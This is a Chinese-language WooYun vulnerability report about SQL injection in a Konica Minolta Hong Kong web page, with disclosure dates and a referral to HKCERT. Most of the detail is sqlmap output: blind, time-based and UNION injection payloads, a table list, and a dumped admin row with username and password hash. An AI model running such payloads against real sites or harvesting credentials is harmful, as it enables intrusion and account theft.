当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156852

漏洞标题:柯尼卡美能达商业系统(香港)有限公司的站点存在SQL注入漏洞(香港地區)

相关厂商:柯尼卡美能达商业系统(香港)有限公司

漏洞作者: 路人甲

提交时间:2015-12-01 11:31

修复时间:2016-01-15 16:48

公开时间:2016-01-15 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-01: 厂商已经确认,细节仅向厂商公开
2015-12-11: 细节向核心白帽子及相关领域专家公开
2015-12-21: 细节向普通白帽子公开
2015-12-31: 细节向实习白帽子公开
2016-01-15: 细节向公众公开

简要描述:

柯尼卡美能达商业系统(香港)有限公司的站点存在SQL注入漏洞,应该属于全球性大公司吧。

详细说明:

一开始以为这是一个普通的小公司,百度了下发现是一家全球性的公司,总部应该是日本的。主要产品应该是打印机。在中国也有分公司,各种电商都在卖这个公司的打印机。应该属于全球性大公司吧。柯尼卡美能达是一个由控股公司柯尼卡美能达控股株式会社旗下的5家事业公司和2家机能共通公司组成的企业集团。

48.png


注入点:
http://**.**.**.**/hk/zh-hk/vertical-markets-industry1-casestudy.php?idpk=7&section=4

sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:
---
Parameter: idpk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idpk=7 AND 2088=2088&section=4
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: idpk=7 OR SLEEP(5)&section=4
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: idpk=7 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a767871,0x77664954546f5a5a7661,0x7178767a71),NULL,NULL,NULL-- &section=4
---
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: idpk (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: idpk=7 AND 2088=2088&section=4
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: idpk=7 OR SLEEP(5)&section=4
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: idpk=7 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a767871,0x77664954546f5a5a7661,0x7178767a71),NULL,NULL,NULL-- &section=4
---
back-end DBMS: MySQL 5.0.12
current database: 'hkcmsdb'
current user is DBA: False
available databases [3]:
[*] hkcmsdb
[*] information_schema
[*] test
Database: hkcmsdb
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| photo | 3106 |
| productphoto | 2311 |
| driverversion | 999 |
| file | 639 |
| producticon | 471 |
| newsphoto | 377 |
| productfile | 212 |
| product | 192 |
| bannerfile | 120 |
| news | 110 |
| awardphoto | 106 |
| award | 103 |
| driver | 103 |
| icon | 96 |
| iconphoto | 96 |
| emulation | 82 |
| vmphoto | 73 |
| manual | 66 |
| job | 47 |
| seo | 43 |
| envcsrphoto | 40 |
| controllermodel | 34 |
| csrphoto | 31 |
| mediacoverage | 31 |
| csr | 30 |
| utility | 28 |
| envcsr | 26 |
| iconhelp | 25 |
| iconhelpphoto | 25 |
| productsubcat | 25 |
| setting | 20 |
| vm | 20 |
| productsubcatphoto | 18 |
| pressreleasehk | 16 |
| bannertype | 14 |
| page | 14 |
| productcat | 14 |
| productcatphoto | 10 |
| newsletterphoto | 9 |
| menu | 8 |
| pagecat | 8 |
| awardcat | 7 |
| series | 7 |
| vmcat | 7 |
| vmcatphoto | 7 |
| icontype | 6 |
| newsfile | 4 |
| newstemplate | 4 |
| os | 4 |
| producttemplate | 4 |
| vmheader | 4 |
| newsletter | 3 |
| pressrelease | 2 |
| utilitycat | 2 |
| `user` | 1 |
| notice | 1 |
+--------------------+---------+


看一下管理员表:

Table: user
[1 entry]
+------+------+---------------+---------+------------------+----------+----------------------------------+
| idpk | name | nameE | phone | email | username | passhash |
+------+------+---------------+---------+------------------+----------+----------------------------------+
| 1 | 管理员 | Administrator | <blank> | [email protected] | admin | 5ca2020b77db8213f4e4a214196addd0 |
+------+------+---------------+---------+------------------+----------+----------------------------------+


其他信息就不看了。

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-01 16:48

厂商回复:

Referred to related parties.

最新状态:

暂无